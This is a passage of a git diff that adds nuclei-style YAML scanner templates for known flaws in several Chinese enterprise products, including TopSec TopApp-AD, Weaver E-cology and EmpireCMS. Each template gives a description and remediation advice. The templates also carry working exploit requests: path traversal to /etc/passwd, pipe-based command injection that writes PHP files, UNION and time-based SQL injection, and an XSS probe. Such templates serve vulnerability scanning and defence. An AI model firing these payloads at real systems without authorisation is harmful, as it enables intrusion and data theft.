1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.topsec.com.cn/ + + 临时修复方案: + 1、过滤".",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: dsl + dsl: + - status_code==200 && contains(body,"bin/ash") + path: + - '{{BaseURL}}/acc/vpn/download.php?f=../../etc/passwd' + method: GET diff --git "a/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_enable_tool_debug_php-RCE.yaml" "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_enable_tool_debug_php-RCE.yaml" new file mode 100755 index 000000000..c92442029 --- /dev/null +++ "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_enable_tool_debug_php-RCE.yaml" @@ -0,0 +1,31 @@ +id: TopApp-AD_enable_tool_debug_php-RCE +info: + name: 天融信TopApp-AD enable_tool_debug.php 参数par 命令执行 + author: + - l0ne1y + description: |- + 天融信TopApp-AD enable_tool_debug.php 命令执行漏洞 + 天融信TopApp-AD应用交付系统是业界功能最全的应用交付设备。 + + 天融信TopApp-AD存在命令执行漏洞,攻击者可以利用该漏洞执行任意的系统命令。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.topsec.com.cn/ + + 临时修复方案: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 + 3、在执行system、eval等命令执行功能的函数前,校验参数内容。 + 4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\’”,双引号“””会被转义为“\””,分号“;”会被转义为“\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 + 5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。 +requests: +- matchers: + - type: dsl + dsl: + - status_code_2==200 && contains(body_2,"c4ca4238a0b923820dcc509a6f75849b") + path: + - '{{BaseURL}}/acc/tools/enable_tool_debug.php?val=0&tool=1&par=1%20%7C%20echo%20%27%3C%3Fphp%20echo%20md5%281%29%3Bunlink%28__FILE__%29%3B%3F%3E%27{{randstr}}.php%20%3E%20{name}%20%7C' + - '{{BaseURL}}/{{randstr}}.php' + method: GET diff --git "a/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_getMacAddr_php-RCE.yaml" "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_getMacAddr_php-RCE.yaml" new file mode 100755 index 000000000..156a703bf --- /dev/null +++ "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_getMacAddr_php-RCE.yaml" @@ -0,0 +1,31 @@ +id: TopApp-AD_getMacAddr_php-RCE +info: + name: 天融信TopApp-AD getMacAddr.php 参数eth 命令执行 + author: + - l0ne1y + description: |- + 天融信TopApp-AD getMacAddr.php 命令执行漏洞 + 天融信TopApp-AD应用交付系统是业界功能最全的应用交付设备。 + + 天融信TopApp-AD存在命令执行漏洞,攻击者可以利用该漏洞执行任意的系统命令。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.topsec.com.cn/ + + 临时修复方案: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 + 3、在执行system、eval等命令执行功能的函数前,校验参数内容。 + 4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\’”,双引号“””会被转义为“\””,分号“;”会被转义为“\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 + 5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。 +requests: +- matchers: + - type: dsl + dsl: + - status_code_2==200 && contains(body_2,"c4ca4238a0b923820dcc509a6f75849b") + path: + - '{{BaseURL}}/acc/network/getMacAddr.php?eth=%20%7C%20echo%20%27%3C%3Fphp%20echo%20md5%281%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%20%3E%20{{randstr}}.php%20%7C%20' + - '{{BaseURL}}/{{randstr}}.php' + method: GET diff --git "a/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_static_arp_include_php-SQLi.yaml" "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_static_arp_include_php-SQLi.yaml" new file mode 100755 index 000000000..4d86392e9 --- /dev/null +++ "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\345\272\224\347\224\250\344\272\244\344\273\230TopApp-AD/TopApp-AD_static_arp_include_php-SQLi.yaml" @@ -0,0 +1,36 @@ +id: TopApp-AD_static_arp_include_php-SQLi +info: + name: 天融信TopApp-AD static_arp_include.php 参数ifName SQL注入漏洞 + author: + - l0ne1y + description: |- + 天融信TopApp-AD static_arp_include.php SQL注入漏洞 + 天融信TopApp-AD应用交付系统是业界功能最全的应用交付设备。 + + 天融信TopApp-AD存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.topsec.com.cn/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && !contains(body_1,"out of range") + - status_code_2==200 && contains(body_2,"out of range") + path: + - '{{BaseURL}}/acc/bindipmac/static_arp_include.php?ifName=123%27%20order%20by%201--' + - '{{BaseURL}}/acc/bindipmac/static_arp_include.php?ifName=123%27%20order%20by%202--' + method: GET diff --git "a/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\347\275\221\347\273\234\345\215\253\345\243\253\345\256\211\345\205\250\345\256\241\350\256\241\347\263\273\347\273\237/SecurityCheckerSys-Unauth-DownloadLogs.yaml" "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\347\275\221\347\273\234\345\215\253\345\243\253\345\256\211\345\205\250\345\256\241\350\256\241\347\263\273\347\273\237/SecurityCheckerSys-Unauth-DownloadLogs.yaml" new file mode 100755 index 000000000..c49494a2f --- /dev/null +++ "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\347\275\221\347\273\234\345\215\253\345\243\253\345\256\211\345\205\250\345\256\241\350\256\241\347\263\273\347\273\237/SecurityCheckerSys-Unauth-DownloadLogs.yaml" @@ -0,0 +1,28 @@ +id: SecurityCheckerSys-Unauth-DownloadLogs +info: + name: 天融信网络卫士安全审计系统未授权日志下载 + author: + - l0ne1y + description: |- + 天融信网络卫士安全审计系统未授权日志下载漏洞 + 天融信TopApp-AD存在未授权访问漏洞,攻击者可以利用该漏洞下载系统日志进而获取到系统信息。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.topsec.com.cn/ + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 +requests: +- matchers: + - type: dsl + dsl: + - ' contains(body,"superman") && status_code==200 ' + matchers-condition: and + path: + - '{{BaseURL}}/log/log_export.php' + method: GET diff --git "a/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\350\264\237\350\275\275\345\235\207\350\241\241\347\263\273\347\273\237/Front-NoCondition-RCE.yaml" "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\350\264\237\350\275\275\345\235\207\350\241\241\347\263\273\347\273\237/Front-NoCondition-RCE.yaml" new file mode 100755 index 000000000..40530610a --- /dev/null +++ "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\350\264\237\350\275\275\345\235\207\350\241\241\347\263\273\347\273\237/Front-NoCondition-RCE.yaml" @@ -0,0 +1,46 @@ +id: Front-NoCondition-RCE +info: + name: 天融信负载均衡系统前台命令执行漏洞 + author: + - l0ne1y + description: |- + 天融信负载均衡系统前台命令执行漏洞 + 天融信负载均衡系统(以下简称TopApp产品)为客户提供高可靠的数据中心解决方案,包括链路负载均衡解决方案、服务器负载均衡解决方案、全局负载均衡解决方案。 + + 天融信负载均衡系统存在前台命令执行漏洞,攻击者可以利用该漏洞执行任意的系统命令。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.topsec.com.cn/ + + 临时修复方案: + 1、尽量不去执行外部的应用程序或命令。 + 2、使用自定义函数或函数库实现外部应用程序或命令的功能。 + 3、在执行system、eval等命令执行功能的函数前,校验参数内容。 + 4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\’”,双引号“””会被转义为“\””,分号“;”会被转义为“;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 + 5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。 +requests: +- matchers: + - type: dsl + condition: or + dsl: + - ' contains(body_2,"testvul") ' + - ' contains(body_4,"testvul") ' + - ' contains(body_6,"testvul") ' + - ' contains(body_8,"testvul") ' + - ' contains(body_10,"testvul") ' + matchers-condition: and + path: + - '{{BaseURL}}/acc/bindipmac/static_restart_arp_action.php?ethName=%20|%20echo%20testvul%20>%20l.php%20|' + - '{{BaseURL}}/acc/bindipmac/l.php' + - '{{BaseURL}}/acc/bindipmac/static_arp.php?ethName=%20|%20echo%20testvul%20>%20d.php%20|' + - '{{BaseURL}}/acc/bindipmac/d.php' + - '{{BaseURL}}/acc/network/redial_pppoe.php?wan=%20|%20echo%20testvul%20>%20test.php%20|' + - '{{BaseURL}}/acc/network/test.php' + - '{{BaseURL}}/acc/network/interface/check_interface_stat.php?eth=%20|%20echo%20testvul%20>%20testh.php%20|' + - '{{BaseURL}}/acc/network/interface/testh.php' + - '{{BaseURL}}/acc/fdisk/fdisk_action.php?action=1&diskname=1%20|%20echo%20testvul%20>%20testc.php%20|%20&setTosize=10' + - '{{BaseURL}}/acc/fdisk/testc.php' + method: GET + stop-at-first-match: true diff --git "a/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\350\264\237\350\275\275\345\235\207\350\241\241\347\263\273\347\273\237/LBS-LFR.yaml" "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\350\264\237\350\275\275\345\235\207\350\241\241\347\263\273\347\273\237/LBS-LFR.yaml" new file mode 100755 index 000000000..a7a922b12 --- /dev/null +++ "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\350\264\237\350\275\275\345\235\207\350\241\241\347\263\273\347\273\237/LBS-LFR.yaml" @@ -0,0 +1,31 @@ +id: LBS-LFR +info: + name: 天融信负载均衡系统任意文件读取漏洞 + author: + - l0ne1y + description: |- + 天融信负载均衡系统任意文件读取漏洞 + 天融信负载均衡系统(以下简称TopApp产品)为客户提供高可靠的数据中心解决方案,包括链路负载均衡解决方案、服务器负载均衡解决方案、全局负载均衡解决方案。 + + 天融信负载均衡系统存在任意文件读取漏洞,攻击者可利用漏洞读取任意文件内容。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.topsec.com.cn/ + + 临时修复方案: + 1、过滤".",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: dsl + dsl: + - status_code==302 && contains(body,"root:/tmp:/bin/ash") + matchers-condition: and + path: + - '{{BaseURL}}/change_lan.php?LanID=../../../../../../../../../etc/passwd%00' + method: GET diff --git "a/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\350\264\237\350\275\275\345\235\207\350\241\241\347\263\273\347\273\237/LBS-SQLi.yaml" "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\350\264\237\350\275\275\345\235\207\350\241\241\347\263\273\347\273\237/LBS-SQLi.yaml" new file mode 100755 index 000000000..044981fcf --- /dev/null +++ "b/config/51pwn/yaml/\345\244\251\350\236\215\344\277\241\350\264\237\350\275\275\345\235\207\350\241\241\347\263\273\347\273\237/LBS-SQLi.yaml" @@ -0,0 +1,34 @@ +id: LBS-SQLi +info: + name: 天融信负载均衡系统SQL注入漏洞 + author: + - l0ne1y + description: |- + 天融信负载均衡系统SQL注入漏洞 + 天融信负载均衡系统(以下简称TopApp产品)为客户提供高可靠的数据中心解决方案,包括链路负载均衡解决方案、服务器负载均衡解决方案、全局负载均衡解决方案。 + + 天融信负载均衡系统存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.topsec.com.cn/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + dsl: + - ' contains(body,"1447200000") ' + matchers-condition: and + path: + - '{{BaseURL}}/acc/bindipmac/static_arp_setting_content.php?arpName=123%27%20UNION%20ALL%20SELECT%20NULL,strftime(%27%s%27,%272015-11-11%27),NULL,NULL,NULL,NULL,NULL,NULL--' + method: GET diff --git "a/config/51pwn/yaml/\345\245\275\350\247\206\351\200\232\350\247\206\351\242\221\344\274\232\350\256\256\347\263\273\347\273\237/hanming-lfr.yaml" "b/config/51pwn/yaml/\345\245\275\350\247\206\351\200\232\350\247\206\351\242\221\344\274\232\350\256\256\347\263\273\347\273\237/hanming-lfr.yaml" new file mode 100755 index 000000000..f0fd125a0 --- /dev/null +++ "b/config/51pwn/yaml/\345\245\275\350\247\206\351\200\232\350\247\206\351\242\221\344\274\232\350\256\256\347\263\273\347\273\237/hanming-lfr.yaml" @@ -0,0 +1,44 @@ +id: hanming-lfr +info: + name: Hanming Video Conferencing File Read + author: + - l0ne1y + tags: + - lfr + - hanming + - lfi + description: |- + 好视通视频会议系统任意文件下载 + 好视通视频会议系统 存在任意文件下载,攻击人员通过目录遍历攻击可以获取系统文件及服务器的配置文件等等。一般来说,攻击者利用服务器API、文件标准权限进行攻击。任意文件读取/下载漏洞可能存在于Web服务器软件本身,也可能存在于Web应用程序之中。 + reference: + - https://mp.weixin.qq.com/s/f-m21pt0xn9qouwoc8llka + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://tg.hst.com/ + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - bit app support + - fonts + - extensions + - type: regex + regex: + - 'root:[x*]:0:0:' + matchers-condition: or + path: + - '{{BaseURL}}/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini' + - '{{BaseURL}}/register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd' + method: GET + stop-at-first-match: true diff --git "a/config/51pwn/yaml/\345\256\235\345\241\224/BT742-PMA-UnauthorizedAccess.yaml" "b/config/51pwn/yaml/\345\256\235\345\241\224/BT742-PMA-UnauthorizedAccess.yaml" new file mode 100755 index 000000000..7c3f3245b --- /dev/null +++ "b/config/51pwn/yaml/\345\256\235\345\241\224/BT742-PMA-UnauthorizedAccess.yaml" @@ -0,0 +1,31 @@ +id: BT742-PMA-UnauthorizedAccess +info: + name: 宝塔7.4.2-pma未授权访问漏洞 + author: + - l0ne1y + description: |- + 宝塔7.4.2-pma未授权访问漏洞 + 官方在Linux面板7.4.2/Windows面板6.8.0 版本中加入了phpmyadmin安全访问模块,原理是通过面板进行访问phpmyadmin,而不是nginx/apache,但因在目录存放时存在一个致命逻辑漏洞,导致nginx/apache也可以访问到专门给面板使用的phpmyadmin目录 + severity: medium + remediation: |- + **官方修复方案** + 升级至官方紧急发布的7.4.3版本关于Linux面板7.4.2及Windows面板6.8紧急安全更新(官方)https://www.bt.cn/bbs/thread-54666-1-1.html + + **临时修复方案** + 1、关闭888端口对外访问和phpmyAdmin服务 + 2、将pma移到其他目录/或删除 +requests: +- matchers: + - type: word + condition: and + words: + - information_schema + - phpMyAdmin + - server_sql.php + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/pma/' + method: GET diff --git "a/config/51pwn/yaml/\345\270\235\345\233\275EmpireCMS/CNVD-2021-15824.yaml" "b/config/51pwn/yaml/\345\270\235\345\233\275EmpireCMS/CNVD-2021-15824.yaml" new file mode 100755 index 000000000..4ecaea2a2 --- /dev/null +++ "b/config/51pwn/yaml/\345\270\235\345\233\275EmpireCMS/CNVD-2021-15824.yaml" @@ -0,0 +1,29 @@ +id: CNVD-2021-15824 +info: + name: EmpireCMS DOM Cross Site-Scripting + author: + - l0ne1y + description: | + EmpireCMS存在XSS漏洞 + + EmpireCMS是一套内容管理系统(CMS)。 + + EmpireCMS存在XSS漏洞。攻击者可利用该漏洞获取用户cookie等敏感信息。 + severity: medium + remediation: "官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁\nhttp://www.phome.net/ \n\n临时修复方案:
1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。'" +requests: +- matchers: + - type: word + condition: and + part: body + words: + - if(Request("url")!=0) + - href=\""+Request("url")+"\" + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(1)' + method: GET diff --git "a/config/51pwn/yaml/\346\230\237\347\275\221\351\224\220\346\215\267\350\247\206\351\242\221\350\257\235\346\234\272/ruijie-info-pwdsetting.yaml" "b/config/51pwn/yaml/\346\230\237\347\275\221\351\224\220\346\215\267\350\247\206\351\242\221\350\257\235\346\234\272/ruijie-info-pwdsetting.yaml" new file mode 100755 index 000000000..0d7fe46ff --- /dev/null +++ "b/config/51pwn/yaml/\346\230\237\347\275\221\351\224\220\346\215\267\350\247\206\351\242\221\350\257\235\346\234\272/ruijie-info-pwdsetting.yaml" @@ -0,0 +1,38 @@ +id: ruijie-info-pwdsetting +info: + name: 星网锐捷视频话机设备管理密码泄露 + author: + - 折跃 + description: |- + 星网锐捷视频话机设备管理密码泄露 + 星网锐捷视频话机设备早期软件版本在web管理页面代码中发现密码hash,存在设备管理密码泄露的风险,对设备正常运行带来安全风险。 + reference: + - "" + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'cOldPasswd') + path: + - '{{BaseURL}}/console/secure/pwdsetting' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\346\255\243\346\226\271\346\225\231\345\212\241\347\256\241\347\220\206\347\263\273\347\273\237/demo.yaml" "b/config/51pwn/yaml/\346\255\243\346\226\271\346\225\231\345\212\241\347\256\241\347\220\206\347\263\273\347\273\237/demo.yaml" new file mode 100755 index 000000000..9f7ef16b2 --- /dev/null +++ "b/config/51pwn/yaml/\346\255\243\346\226\271\346\225\231\345\212\241\347\256\241\347\220\206\347\263\273\347\273\237/demo.yaml" @@ -0,0 +1,38 @@ +id: demo +info: + name: demo + author: + - 折跃 + description: |- + 正方教务系统SQL注入 + 正方教务管理系统以培养、运行、保障、监控为主线,实现教务工作事务性管理和战略性管理的相互叠加,满足学校培养过程管理、教学质量检查、教学工作评价、教学业绩评价、教学改革发展等战略性需求。 + + 正方软件股份有限公司正方教务管理系统存在SQL注入漏洞,攻击者可利用该漏洞重置获取敏感信息。 + reference: + - "" + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.zfsoft.com/ + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'098f6bcd4621d3') + raw: + - | + GET /ResultXml_common.aspx?k=%&column=%27[test=%27||CHR(48)||CHR(57)||CHR(56)||CHR(102)||CHR(54)||CHR(98)||CHR(99)||CHR(100)||CHR(52)||CHR(54)||CHR(50)||CHR(49)||CHR(100)||CHR(51)||%27]%27&table=xsjbxxb+where+rownum<=10-- HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/E_cology-sqli-Page.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/E_cology-sqli-Page.yaml" new file mode 100755 index 000000000..44089fd14 --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/E_cology-sqli-Page.yaml" @@ -0,0 +1,47 @@ +id: E_cology-sqli-Page +info: + name: 泛微 E-cology Page sql注入 + author: + - 折跃 + description: |- + 泛微 E-cology Page SQL注入 + 泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台,e-cology可形成一系列的通用解决方案和行业解决方案。 + + 泛微 E-cology中存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200&&status_code_2==200 + - (duration_2 - duration_1) >=5 + - type: dsl + condition: and + dsl: + - status_code_3==200&&status_code_4==200 + - (duration_4 - duration_3) >=5 + matchers-condition: or + path: + - '{{BaseURL}}/page/maint/login/Page.jsp?templateId=18' + - '{{BaseURL}}/page/maint/login/Page.jsp?templateId=18%20waitfor%20delay%20''0:0:5''' + - '{{BaseURL}}/page/maint/login/Page.jsp?templateId=18' + - '{{BaseURL}}/page/maint/login/Page.jsp?templateId=18%20and%201=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(199)||CHR(81)||CHR(109),5)''' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\346\263\233\345\276\256OA/E_cology-sqli-login.yaml" "b/config/51pwn/yaml/\346\263\233\345\276\256OA/E_cology-sqli-login.yaml" new file mode 100755 index 000000000..b011cdd19 --- /dev/null +++ "b/config/51pwn/yaml/\346\263\233\345\276\256OA/E_cology-sqli-login.yaml" @@ -0,0 +1,47 @@ +id: E_cology-sqli-login +info: + name: 泛微 E-cology login sql注入 + author: + - 折跃 + description: |- + 泛微 E-cology login SQL注入漏洞 + 